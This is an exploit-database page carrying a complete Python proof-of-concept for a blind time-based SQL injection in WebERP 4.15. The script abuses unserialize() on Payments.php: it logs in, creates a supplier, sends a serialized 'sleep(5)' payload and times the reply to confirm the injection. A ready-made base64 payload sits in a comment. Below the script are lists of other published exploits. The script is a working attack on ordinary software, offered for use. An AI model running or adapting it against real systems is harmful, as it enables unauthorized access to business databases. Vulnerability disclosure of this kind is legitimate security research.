Menu

Search for hundreds of thousands of exploits

"WebERP 4.15 - SQL injection"

Author

Exploit author

"Semen Alexandrovich Lyhin"

Platform

Exploit platform

php

Release date

Exploit published date

2019-06-20

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
# Exploit Title: Blind SQL injection in WebERP.
# Date: June 10, 2019
# Exploit Author: Semen Alexandrovich Lyhin (https://www.linkedin.com/in/semenlyhin/)
# Vendor Homepage: http://www.weberp.org/
# Version: 4.15

# A malicious query can be sent in base64 encoding to unserialize() function. It can be deserialized as an array without any sanitization then. 
# After it, each element of the array is passed directly to the SQL query. 

import requests
import base64
import os
import subprocess
from bs4 import BeautifulSoup
import re
import time
import sys

def generatePayload(PaidAmount="0",PaymentId="0"):
    #THIS FUNCTION IS INSECURE BY DESIGN
    ToSerialize = r"[\"%s\" => \"%s\"]" % (PaymentId, PaidAmount)
    return os.popen("php -r \"echo base64_encode(serialize(" + ToSerialize + "));\"").read()

def getCookies(ip, CompanyNameField, usr, pwd):
    r = requests.get("http://" + ip + "/index.php")
    s = BeautifulSoup(r.text, 'lxml')
    m = re.search("FormID.*>", r.text)
    FormID = m.group(0).split("\"")[2]
    
    data = {"FormID":FormID,"CompanyNameField":CompanyNameField,"UserNameEntryField":usr,"Password":pwd,"SubmitUser":"Login"}
    r = requests.post("http://" + ip + "/index.php", data)
    
    return {"PHPSESSIDwebERPteam":r.headers["Set-Cookie"][20:46]}
    

def addSupplierID(name, cookies, proxies):
    r = requests.get("http://" + ip + "/Suppliers.php", cookies=cookies)
    s = BeautifulSoup(r.text, 'lxml')
    m = re.search("FormID.*>", r.text)
    FormID = m.group(0).split("\"")[2]
    
    data = {"FormID":FormID,"New":"Yes","SupplierID":name,"SuppName":name,"SupplierType":"1","SupplierSince":"01/06/2019","BankPartics":"","BankRef":"0",
            "PaymentTerms":"20","FactorID":"0","TaxRef":"","CurrCode":"USD","Remittance":"0","TaxGroup":"1","submit":"Insert+New+Supplier"}
            
    requests.post("http://" + ip + "/Suppliers.php", data=data,cookies=cookies,proxies=proxies)


def runExploit(cookies, supplier_id, payload, proxies):
    r = requests.get("http://" + ip + "/Payments.php", cookies=cookies)
    s = BeautifulSoup(r.text, 'lxml')
    m = re.search("FormID.*>", r.text)
    FormID = m.group(0).split("\"")[2]
    
    data = {"FormID":FormID,
            "CommitBatch":"2",
            "BankAccount":"1",
            "DatePaid":"01/06/2019",
            "PaidArray":payload}
         
    requests.post("http://" + ip + "/Payments.php?identifier=1559385755&SupplierID=" + supplier_id, data=data,cookies=cookies,proxies=proxies)


if __name__ == "__main__":
    #proxies = {'http':'127.0.0.1:8080'}
    proxies = {}
    
    if len(sys.argv) != 6:
        print '(+) usage: %s <target> <path> <login> <password> <order>' % sys.argv[0]
        print '(+) eg: %s 127.0.0.1 "weberp/webERP/" admin weberp 1' % sys.argv[0]
        print 'Order means the number of company on the website. Can be gathered from the login page and usually equals 0 or 1'
        exit()
    
    ip = sys.argv[1] + "/" + sys.argv[2]
    
    #if don't have php, set Payload to the next one to check this time-based SQLi: YToxOntpOjA7czoyMzoiMCB3aGVyZSBzbGVlcCgxKT0xOy0tIC0iO30=
    #payload = generatePayload("0 where sleep(1)=1;-- -", "0")
    
    payload = generatePayload("0", "' or sleep(5) and '1'='1")
    
    #get cookies
    cookies = getCookies(ip, sys.argv[5], sys.argv[3], sys.argv[4])
    
    addSupplierID("GARUMPAGE", cookies, proxies)
    
    t1 = time.time()
    runExploit(cookies, "GARUMPAGE", payload, proxies)
    t2 = time.time()
    
    if (t2-t1>4):
        print "Blind sqli is confirmed"
    else:
        print "Verify input data and try again"
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2019-10-01 "DotNetNuke 9.3.2 - Cross-Site Scripting" webapps multiple "Semen Alexandrovich Lyhin"
2019-09-26 "inoERP 4.15 - 'download' SQL Injection" webapps php "Semen Alexandrovich Lyhin"
2019-09-25 "NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution" webapps json "Semen Alexandrovich Lyhin"
2019-06-20 "WebERP 4.15 - SQL injection" webapps php "Semen Alexandrovich Lyhin"
2019-04-10 "D-Link DI-524 V2.06RU - Multiple Cross-Site Scripting" webapps hardware "Semen Alexandrovich Lyhin"
2018-11-13 "XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode)" local windows "Semen Alexandrovich Lyhin"
2018-11-06 "Arm Whois 3.11 - Buffer Overflow (SEH)" local windows_x86 "Semen Alexandrovich Lyhin" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected